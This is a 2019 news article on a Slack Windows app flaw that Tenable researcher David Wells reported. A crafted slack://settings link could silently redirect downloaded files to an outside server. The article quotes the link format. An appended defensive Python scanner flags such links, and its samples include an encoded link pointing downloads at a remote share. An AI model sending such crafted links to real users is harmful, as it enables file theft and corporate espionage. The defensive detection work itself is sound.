Slack patches Windows app bug that could've been used for spying
https://mashable.com/article/slack-patches-windows-bug-spying/
2019-05-17 20:54:44 UTC
PCMag.com is a leading authority on technology, delivering Labs-based, independent reviews of the latest products and services. Our expert industry analysis and practical solutions help you make better buying decisions and get more from technology.
A security researcher has uncovered a flaw in Slack that could’ve been exploited to steal files over the business messaging app and potentially spread malware.
The flaw involves Slack’s Windows desktop app, and how it can automatically send downloaded files to a certain destination—whether it be on your PC or to an online storage server. You can set a download location in the app’s preferences section. However, David Wells, a researcher at the security firm Tenable, noticed there’s another way to configure the option: Via a special link.
“Crafting a link like ‘slack://settings/?update={‘PrefSSBFileDownloadPath’:<pathHere>’}’ would change the default download location if clicked,” Wells wrote in a blog post on the vulnerability.
Wells realized the same function could be abused. Imagine a hacker using the links to secretly reconfigure a Slack desktop app to send all downloaded files to an outside server. “Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview,” Wells’s security firm Tenable said in a separate report.
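As an added illustration (not code from Slack, Tenable or this article), a defender could scan exported message text or proxy logs for the settings links described above and report the download path each one tries to set. The sample messages, the hostname and the `local_drive` heuristic are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

KEY = "PrefSSBFileDownloadPath"  # preference name quoted in the article
LINK_RE = re.compile(r"slack://settings/?\?\S+", re.IGNORECASE)
# Chat clients often turn straight quotes into curly ones; normalise them.
QUOTES = str.maketrans({"‘": "'", "’": "'", "“": '"', "”": '"'})
VALUE_RE = re.compile(r"""['"]?%s['"]?\s*:\s*['"]?([^'"}]+)""" % KEY)
LOCAL_DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")  # assumption: drive-letter path = local

def find_download_path_links(text):
    """Return one finding per slack://settings link that sets the download path."""
    findings = []
    for match in LINK_RE.finditer(text):
        url = match.group(0)
        # parse_qs percent-decodes the value, so encoded links are caught too.
        for update in parse_qs(urlsplit(url).query).get("update", []):
            value = VALUE_RE.search(update.translate(QUOTES))
            if value is None:
                continue
            path = value.group(1).strip()
            findings.append({
                "url": url,
                "path": path,
                # Anything that is not a local drive path deserves a closer look.
                "local_drive": bool(LOCAL_DRIVE_RE.match(path)),
            })
    return findings

# Constructed sample messages, not taken from any real workspace.
SAMPLE_MESSAGES = [
    r"tidy up: slack://settings/?update={'PrefSSBFileDownloadPath':'C:\Users\alice\Downloads'} thanks",
    "new policy: slack://settings/?update=%7B%22PrefSSBFileDownloadPath%22%3A"
    "%22%5C%5Cfiles.example.invalid%5Cdrop%22%7D",
    "see you in slack://channel?team=T000&id=C000",  # ordinary deep link, ignored
]

if __name__ == "__main__":
    for finding in find_download_path_links("\n".join(SAMPLE_MESSAGES)):
        level = "info" if finding["local_drive"] else "REVIEW"
        print(f"[{level}] download path -> {finding['path']}")
```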